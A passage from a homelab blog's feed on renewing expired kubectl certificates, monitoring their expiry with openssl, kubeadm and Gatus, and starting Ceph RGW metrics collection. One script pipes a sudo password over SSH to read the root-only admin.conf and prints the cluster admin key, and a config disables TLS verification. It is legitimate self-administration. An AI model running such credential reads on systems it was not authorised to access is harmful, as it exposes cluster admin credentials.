in the initial drop from 156 W to about 146 W. Then, at about 21:16, I pulled
the power plug from the PSU, resulting in another drop to 138 W. Which honestly
looks a bit weird? By that time, the only things still powered were two 120mm fans
at pretty low revolutions and the BMC itself, which is a piddly Allwinner SoC
and really shouldn&rsquo;t eat almost 10 W. The only explanation I can come up with:
the power supply is a 550 W unit, and running it at such a low draw probably makes
it terribly inefficient.</p>
<p>Might warrant some more investigations.</p>
<p>And just in case I don&rsquo;t find time for another post before it: Happy Christmas
to all of you who celebrate. I hope you find at least a modicum of peace and
quiet.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Kubernetes Cert Renewal and Monitoring</title>
      <link>https://blog.mei-home.net/posts/k8s-certs/</link>
      <pubDate>Sun, 07 Dec 2025 11:15:45 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-certs/</guid>
      <description>I had a little k8s certificate SNAFU</description>
      <content:encoded><![CDATA[<p>Wherein I let my kubectl certs expire and implement some monitoring.</p>
<p>A couple of days ago, I was getting through my list of small maintenance tasks
in my Kubernetes cluster. Stuff like checking the resource consumption of new
deployments and adapting the resource limits. And in the middle of it, one of
my kubectl invocations was greeted by this message:</p>
<pre tabindex="0"><code>error: You must be logged in to the server (Unauthorized)
</code></pre><p>So I had a look at my kubectl credentials. For those who don&rsquo;t know, kubectl
authenticates to the cluster with a client TLS cert by default. I had just
copied the <code>admin.conf</code> config file kubeadm helpfully creates during cluster
setup. I didn&rsquo;t really see any reason to set up anything more elaborate,
considering that I&rsquo;m the only admin in the cluster.</p>
<p>And those certs had now expired. Not really a big deal, I have access to the
control plane nodes and could copy the new <code>admin.conf</code>. But I wanted to
introduce some monitoring and document how to renew the kubectl client certs.</p>
<p>The first problem to tackle: I wanted something a bit more elaborate than
&ldquo;just <code>cat /etc/kubernetes/admin.conf</code> and copy+paste the cert and key&rdquo;. And
here&rsquo;s where the embarrassment began. The <code>admin.conf</code> is available on my three
control plane nodes. But how to get it onto my command and control machine?</p>
<p>My first thought was: Just use SSH! But the problem was: I don&rsquo;t allow root
logins via SSH. And the <code>admin.conf</code> is owned by root and not readable by anyone
else. So if I wanted to do it over SSH, I would need to also somehow get a sudo
call in there. Easier said than done. Because the only account which has SSH
access to my machines can&rsquo;t just do sudo - it needs to provide a password, as
an additional security layer. And it took me a really, really long time to
figure out how to call sudo via SSH and get the password through the pipe to sudo.</p>
<p>Here&rsquo;s the script I came up with:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Kubeadm installs put an admin user kube.conf file at /etc/kubernetes/admin.conf</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># by default</span>
</span></span><span style="display:flex;"><span>ADMIN_FILE<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/etc/kubernetes/admin.conf&#34;</span>
</span></span><span style="display:flex;"><span>ADMIN_TEMP<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>HOME<span style="color:#e6db74">}</span><span style="color:#e6db74">/temp/admin.conf&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Name of the control plane host</span>
</span></span><span style="display:flex;"><span>CP_HOST<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;control-plane-1&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Request the sudo password and put it into SUDO_PASS</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># -s prevents echoing of the input on the terminal</span>
</span></span><span style="display:flex;"><span>read -p <span style="color:#e6db74">&#34;Sudo pass: &#34;</span> -r -s SUDO_PASS
</span></span><span style="display:flex;"><span>echo
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ssh myuser@<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CP_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;sudo -p \&#34;\&#34; -S cat </span><span style="color:#e6db74">${</span>ADMIN_FILE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">&lt;&lt;&lt;</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>SUDO_PASS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> &gt; ~/temp/admin.conf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># This extracts the certificate and the private key from the kube config</span>
</span></span><span style="display:flex;"><span>CERT_DATA<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>yq -r <span style="color:#e6db74">&#39;.users[0].user.&#34;client-certificate-data&#34;&#39;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ADMIN_TEMP<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | base64 -d | sed -e <span style="color:#e6db74">&#39;s/$/\\n/g&#39;</span> | tr -d <span style="color:#e6db74">&#39;\n&#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>CERT_KEY<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>yq -r <span style="color:#e6db74">&#39;.users[0].user.&#34;client-key-data&#34;&#39;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ADMIN_TEMP<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | base64 -d | sed -e <span style="color:#e6db74">&#39;s/$/\\n/g&#39;</span> | tr -d <span style="color:#e6db74">&#39;\n&#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Removing the temporary file for security</span>
</span></span><span style="display:flex;"><span>rm <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ADMIN_TEMP<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Finally outputting the cert</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;CERT:&#34;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CERT_DATA<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;Key:&#34;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CERT_KEY<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span></code></pre></div><p>The main piece here is the actual copying, which took me way too long to figure
out:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ssh myuser@<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CP_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;sudo -p \&#34;\&#34; -S cat </span><span style="color:#e6db74">${</span>ADMIN_FILE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">&lt;&lt;&lt;</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>SUDO_PASS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> &gt; ~/temp/admin.conf
</span></span></code></pre></div><p>It SSH&rsquo;s to one of my CP hosts and runs <code>sudo -p &quot;&quot; -S cat /etc/kubernetes/admin.conf</code>.
The password previously requested via <code>read</code> is piped into the SSH command&rsquo;s
<code>stdin</code> as a here-string. The <code>-p &quot;&quot;</code> is actually load-bearing here. Without it,
sudo would print its password prompt, which would end up being redirected
into the temporary file in addition to the <code>admin.conf</code> file&rsquo;s content.
The <code>-S</code> option tells sudo to read the password from its standard input instead
of the terminal.</p>
<p>Another nifty little thing I discovered is <a href="https://mikefarah.gitbook.io/yq/">yq</a>,
basically an equivalent of <a href="https://jqlang.org/">jq</a> but for YAML files.</p>
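<p>As a quick illustration: pulling a single field out of a kube config is a
one-liner. This mirrors the calls in the script above; the field path is simply
the standard kube config layout:</p>
<pre tabindex="0"><code>yq -r &#39;.clusters[0].cluster.server&#39; ~/temp/admin.conf
</code></pre>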
<p>I updated my credentials and everything worked again. But the fact that I allowed
the certs to expire bugged me, and I decided to introduce another little script
to regularly check the time to expiry of the kubectl client certs.</p>
<h2 id="monitoring-the-certs">Monitoring the certs</h2>
<p>The main problem with monitoring the cert was that it&rsquo;s a client cert, so there&rsquo;s
no HTTP endpoint I could hit to check it regularly. It is only present on my
command and control machine. So I needed something that runs on the C&amp;C host,
and that I wouldn&rsquo;t forget to check regularly. I ended up writing a small script
which checks the expiration dates and tucked it into my <code>~/.profile</code> so it runs
whenever I log into the machine.</p>
<p>The script looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># 30 days</span>
</span></span><span style="display:flex;"><span>WARNING_DURATION<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;2592000&#34;</span>
</span></span><span style="display:flex;"><span>COLOR_RED<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;\e[0;31m&#39;</span>
</span></span><span style="display:flex;"><span>NO_COLOR<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;\033[0m&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>PROD_CERT<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>pass show k8s/credentials | jq -r .status.clientCertificateData<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>CONFIG_CERT<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>pass show k8s/master-credentials | jq -r .status.clientCertificateData<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> checkExpiry<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  cluster<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>1<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  cert<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>2<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> ! openssl x509 -checkend <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>WARNING_DURATION<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> -noout &gt; /dev/null <span style="color:#f92672">&lt;&lt;&lt;</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>cert<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    local endDate
</span></span><span style="display:flex;"><span>    endDate<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>openssl x509 -enddate -noout <span style="color:#f92672">&lt;&lt;&lt;</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>cert<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | cut -d <span style="color:#e6db74">&#39;=&#39;</span> -f2<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>    printf <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>COLOR_RED<span style="color:#e6db74">}</span><span style="color:#e6db74">The </span><span style="color:#e6db74">${</span>cluster<span style="color:#e6db74">}</span><span style="color:#e6db74"> cluster kubectl cert is about to expire!\nEnd date: %b</span><span style="color:#e6db74">${</span>NO_COLOR<span style="color:#e6db74">}</span><span style="color:#e6db74">\n&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>endDate<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>checkExpiry <span style="color:#e6db74">&#34;production&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PROD_CERT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>checkExpiry <span style="color:#e6db74">&#34;configuration&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CONFIG_CERT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span></code></pre></div><p>I&rsquo;m starting out by fetching the credentials from my <a href="https://www.passwordstore.org/">pass store</a>.
If you want to read more about my kube credential setup and how I changed it so
that the kubectl credentials don&rsquo;t just sit unencrypted on the disk, have a look
at <a href="https://blog.mei-home.net/posts/securing-k8s-credentials/">this post</a>.</p>
<p>I&rsquo;m using the <code>openssl</code> command line tool to do the checking, which already has
the <code>checkend</code> flag to check whether the given certificate is valid for at least
<code>${WARNING_DURATION}</code> more seconds. Quite a useful function, removing the need to
do date arithmetic in bash. If the cert is not valid for at least another 30
days, the script will output a warning in red. 30 days should be enough time for
me to log into the C&amp;C host at least once, even during times like the current
one where I&rsquo;m not working on Homelab projects much.</p>
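<p>Outside of the script, the same check also works directly against a certificate
file, which is handy for quick manual tests; the file name here is just a placeholder:</p>
<pre tabindex="0"><code># Exit code 0: cert is still valid 30 days from now; non-zero: it expires before then
openssl x509 -checkend 2592000 -noout -in mycert.pem &amp;&amp; echo &#34;OK&#34; || echo &#34;expires soon&#34;
</code></pre>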
<p>I&rsquo;m calling the <code>checkExpiry</code> function twice, because I&rsquo;ve got two clusters and
hence two sets of credentials. One is my main cluster running most of my workloads.
The other is intended as a management cluster. It&rsquo;s currently still running in a
VM I only launch when needed, as part of my Tinkerbell experiments. I really need
to get back to those at some point&hellip;</p>
<p>My plan was to just stick the script into my <code>~/.profile</code> file, so the check is
only done once, when I log into the machine. The <code>~/.profile</code> script is only
sourced for a login shell, so it should not be executed when I&rsquo;m just opening a
fresh terminal. But this didn&rsquo;t work out as intended. I&rsquo;m using <a href="https://github.com/tmux/tmux">tmux</a>,
and for some reason, the script was executed whenever I open a new pane or window.</p>
<p>After some searching, I found that tmux runs a login shell for every new pane/window
<a href="https://www.mail-archive.com/tmux-users@lists.sourceforge.net/msg05901.html">by default</a>.
I found the solution for changing that behavior in the <a href="https://wiki.archlinux.org/title/Tmux#Start_a_non-login_shell">Arch Linux wiki</a>.
Following that instruction, I put the following line at the end of my <code>~/.tmux.conf</code>
file:</p>
<pre tabindex="0"><code>set -g default-command &#34;${SHELL}&#34;
</code></pre><p>With that, I&rsquo;d get the following output when the kubectl client cert gets close
to the expiration date:</p>
<pre tabindex="0"><code>The production cluster kubectl cert is about to expire!
End date: Sep 14 11:31:30 2026 GMT
The configuration cluster kubectl cert is about to expire!
End date: May 31 20:29:11 2026 GMT
</code></pre><h2 id="monitoring-kubeadm-certs">Monitoring kubeadm certs</h2>
<p>While looking for instructions on how to renew my kubectl certs, I came upon
<a href="https://kubernetes.io/docs/tasks/administer-cluster/kubeadm/kubeadm-certs/#check-certificate-expiration">this Kubernetes docs page</a>.
It mentions this command for getting the expiration dates of Kubeadm&rsquo;s own certs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubeadm certs check-expiration
</span></span></code></pre></div><p>This command shows all of the certificates kubeadm generates for a cluster,
including the certs for all of the Kubernetes control plane components:</p>
<pre tabindex="0"><code>CERTIFICATE                  EXPIRES                  RESIDUAL TIME   CERTIFICATE AUTHORITY   EXTERNALLY MANAGED
admin.conf                   Sep 14, 2026 11:31 UTC   281d            ca                      no
apiserver                    Sep 14, 2026 10:24 UTC   281d            ca                      no
apiserver-etcd-client        Sep 14, 2026 10:24 UTC   281d            etcd-ca                 no
apiserver-kubelet-client     Sep 14, 2026 10:24 UTC   281d            ca                      no
controller-manager.conf      Sep 14, 2026 10:24 UTC   281d            ca                      no
etcd-healthcheck-client      Sep 14, 2026 10:24 UTC   281d            etcd-ca                 no
etcd-peer                    Sep 14, 2026 10:24 UTC   281d            etcd-ca                 no
etcd-server                  Sep 14, 2026 10:24 UTC   281d            etcd-ca                 no
front-proxy-client           Sep 14, 2026 10:24 UTC   281d            front-proxy-ca          no
scheduler.conf               Sep 14, 2026 10:24 UTC   281d            ca                      no

CERTIFICATE AUTHORITY   EXPIRES                  RESIDUAL TIME   EXTERNALLY MANAGED
ca                      Dec 17, 2033 19:15 UTC   8y              no
etcd-ca                 Dec 17, 2033 19:15 UTC   8y              no
front-proxy-ca          Dec 17, 2033 19:15 UTC   8y              no
</code></pre><p>Thinking back a little bit, I recalled that September 14th was the last time I
ran a cluster update, so the regular updates evidently already renew these certs. In theory, that
means I should be fine - I&rsquo;m doing cluster updates frequently enough that I
should never let those certs expire within their 365 day TTL. But I still wanted
to monitor those somehow, just in case.</p>
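<p>Should I ever need to renew them outside of a cluster update, kubeadm can also do
that directly. It has to be run on each control plane node, and the control plane
components need to be restarted afterwards to pick up the new certs:</p>
<pre tabindex="0"><code>sudo kubeadm certs renew all
</code></pre>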
<p>As some of those are client certs, I couldn&rsquo;t just point my <a href="https://gatus.io/">Gatus</a>
instance at them, like I do for my Let&rsquo;s Encrypt main cert. While looking around,
I came across <a href="https://github.com/enix/x509-certificate-exporter">this Prometheus exporter</a>.
It can launch a DaemonSet on k8s nodes and then watch certificate files (and kube config
files as well) on disk and check their expiration dates. In short, it looked
exactly like what I wanted. But there was a problem, as stated in <a href="https://github.com/enix/x509-certificate-exporter/tree/main/deploy/charts/x509-certificate-exporter#watchfiles-and-inode-change">their docs</a>:</p>
<blockquote>
<p>Be aware that for every file path provided to watchFiles, the exporter container will be given read access to the parent directory. This is how we handle the problem of changing inodes. Metrics will of course be limited to the single targetted path, as the program is told to watch the real path from watchFiles.</p></blockquote>
<p>The full note explains that making the containing directory available is necessary
because when the certs are rotated, the exporter would keep the old file open, as
it wouldn&rsquo;t have a way to know that the file was rotated. This makes sense. But
I find it problematic. The <code>/etc/kubernetes/pki</code> directory on my control plane
nodes looks like this:</p>
<pre tabindex="0"><code>-rw-r--r-- 1 root root 1123 Sep 14 12:26 apiserver-etcd-client.crt
-rw------- 1 root root 1675 Sep 14 12:26 apiserver-etcd-client.key
-rw-r--r-- 1 root root 1176 Sep 14 12:26 apiserver-kubelet-client.crt
-rw------- 1 root root 1675 Sep 14 12:26 apiserver-kubelet-client.key
-rw-r--r-- 1 root root 1314 Sep 14 12:26 apiserver.crt
-rw------- 1 root root 1675 Sep 14 12:26 apiserver.key
-rw-r--r-- 1 root root 1107 May  1  2025 ca.crt
-rw------- 1 root root 1675 May  1  2025 ca.key
drwxr-xr-x 2 root root 4096 May  1  2025 etcd
-rw-r--r-- 1 root root 1123 May  1  2025 front-proxy-ca.crt
-rw------- 1 root root 1679 May  1  2025 front-proxy-ca.key
-rw-r--r-- 1 root root 1119 Sep 14 12:26 front-proxy-client.crt
-rw------- 1 root root 1675 Sep 14 12:26 front-proxy-client.key
-rw------- 1 root root 1679 May  1  2025 sa.key
-rw-r--r-- 1 root root  451 May  1  2025 sa.pub
</code></pre><p>So if I were to tell the exporter to watch all of the <code>.crt</code> files, it would also
necessarily gain read access to the <code>.key</code> files. Which means that I would now
have a program running in my cluster which could read the certificates and private
keys of the main Kubernetes infrastructure in my Homelab. That just does not
sound like a good idea to me.</p>
<p>I wasn&rsquo;t able to come up with a proper solution, so I decided to just monitor
the apiserver certificate and use it as a stand-in for the other certs&rsquo; expiration
dates. They should all be renewed together during my regular cluster updates,
so just monitoring one of the certs should be good enough. &#x1f91e;</p>
<p>I did not even have to make any changes in Gatus, as it already reports the
expiry dates of all certificates for HTTPS endpoints it monitors. Creating a
Grafana panel was as easy as using this PromQL query:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span>gatus_results_certificate_expiration_seconds{name<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">K8s: API</span>&#34;}
</span></span></code></pre></div><p>It refers to this entry in my Gatus config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;K8s: API&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;K8s&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;https://k8s.example.com:6443/livez&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#e6db74">&#34;GET&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">5m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[STATUS] == 200&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">client</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">insecure</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>One last thing slightly bothering me are the CA certs. Those expire in 8 years,
and I decided to not bother monitoring them. I will leave them un-monitored
to add a bit of potential excitement to future me&rsquo;s life. &#x1f601;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Gathering Metrics from Ceph RGW S3</title>
      <link>https://blog.mei-home.net/posts/ceph-rgw-s3-metrics/</link>
      <pubDate>Fri, 10 Oct 2025 22:32:49 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-rgw-s3-metrics/</guid>
      <description>I set up a Prometheus exporter to gather metrics from Ceph&amp;#39;s S3 RadosGW.</description>
      <content:encoded><![CDATA[<p>Wherein I set up some Prometheus metrics gathering from Ceph&rsquo;s S3 RGW and build
a dashboard to show the data.</p>
<p>I like metrics. And dashboards. And plots. And one of the things I&rsquo;ve been missing
up to now was data from Ceph&rsquo;s <a href="https://docs.ceph.com/en/reef/radosgw/">RadosGateway</a>.
That&rsquo;s the Ceph daemon which provides an S3 (and Swift) compatible API for Ceph
clusters.</p>
<p>While <a href="https://rook.io/">Rook</a>, the tool I&rsquo;m using to deploy Ceph in my k8s cluster,
already wires up Ceph&rsquo;s own exporters to be scraped by a <a href="https://prometheus-operator.dev/">Prometheus Operator</a>,
that does not include S3 data.
My main interest here is the development of bucket sizes over time, so I can see
early when something is misconfigured. Up to now, the only indicator I had was
the size of the pool backing the RadosGW, which currently stands at 1.42 TB,
making it the second-largest pool in my cluster.</p>
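<p>The pool sizes themselves can be checked with Ceph&rsquo;s own tooling; with Rook, one
way is through the toolbox Pod, assuming the default <code>rook-ceph</code> namespace and
toolbox deployment name:</p>
<pre tabindex="0"><code>kubectl -n rook-ceph exec deploy/rook-ceph-tools -- ceph df
</code></pre>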
<p>For providing the data in Prometheus format, I&rsquo;m using <a href="https://github.com/blemmenes/radosgw_usage_exporter">this exporter</a>.
It uses the RadosGW&rsquo;s <a href="https://docs.ceph.com/en/reef/radosgw/admin/#usage">Usage API</a>
to get the data and converts it into Prometheus metrics.
The same data can also be requested with <code>radosgw-admin</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>radosgw-admin usage show
</span></span></code></pre></div><p>This shows data for all users and buckets. An example output just for my blog
bucket/user looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;entries&#34;</span>: [
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;user&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;buckets&#34;</span>: [
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bucket&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;time&#34;</span>: <span style="color:#e6db74">&#34;2024-01-21T00:00:00.000000Z&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;epoch&#34;</span>: <span style="color:#ae81ff">1705795200</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;owner&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;categories&#34;</span>: [
</span></span><span style="display:flex;"><span>                        [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                        {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;get_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">2995740956</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">79510</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">79496</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;put_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">61606006</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">869</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">869</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                    ],
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bucket&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;time&#34;</span>: <span style="color:#e6db74">&#34;2025-09-13T21:00:00.000000Z&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;epoch&#34;</span>: <span style="color:#ae81ff">1757797200</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;owner&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;categories&#34;</span>: [
</span></span><span style="display:flex;"><span>                        [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                        {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;get_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">4085435893</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">81549</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">81516</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;put_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">10946996</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">315</span>,
